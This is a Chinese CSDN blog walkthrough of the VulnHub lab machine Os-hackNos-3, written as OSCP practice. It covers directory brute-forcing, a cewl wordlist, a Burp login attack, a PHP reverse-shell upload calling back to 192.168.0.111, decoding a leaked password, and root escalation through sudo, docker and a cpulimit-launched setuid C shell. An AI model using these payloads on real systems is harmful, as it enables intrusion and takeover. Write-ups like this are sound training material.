oscp——Os-hackNos-3

0x00 前言

这个是第十八台机子了,之前做过同系列的Os-hackNos-2.1。
最后,E788B1E88081E5A986E5939F

链接

https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/

0x01 信息收集

ip

在这里插入图片描述

端口

在这里插入图片描述

0x02 攻击

端口

端口未果

Web

80端口访问一下,dirb
在这里插入图片描述
dirb爆破结果
dirb http://192.168.0.112/
在这里插入图片描述
访问http://192.168.0.112/scripts/

在这里插入图片描述
下载了automail.pl文件,但是未果
访问http://192.168.0.112/index.html可以看到提示
在这里插入图片描述
然后扫一下目录,发现一个admin目录

利用页面密码进行爆破
cewl http://192.168.0.112/websec/ >a.txt
在这里插入图片描述

bp延时爆破一下,这里存在防护,bp开启延时
在这里插入图片描述

打开之后发现可以上传文件
在这里插入图片描述
写一个反弹shell

$sock=fsockopen("192.168.0.111",1234);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);

进行监听
在这里插入图片描述
然后拿到第一个flag
在这里插入图片描述

然后在/var/local 处找到一个database
在这里插入图片描述
可以看到这个,这需要使用http://www.spammimic.com/spreadsheet.php进行解密

在这里插入图片描述
解密之后得到
Security@x@

然后su blackdevil得到blackdevil账号的权限
在这里插入图片描述
然后sudo -l 进行查看
在这里插入图片描述
sudo su拿到root权限
在这里插入图片描述
还有一种就是docker提权,这个docker提权是真的慢鸭,下载就要半天
在这里插入图片描述
在这里插入图片描述
还有一种就是cpulimit提权

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>


int main()
{
  setuid(0);
  setgid(0);
  system("/bin/bash");
  return 0;
}

gcc 1.c -o att

cpulimit -l 100 -f ./att

在这里插入图片描述

0x03 总结

  • 学会了使用cewl进行密码收集
  • 使用cpulimit提权
相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页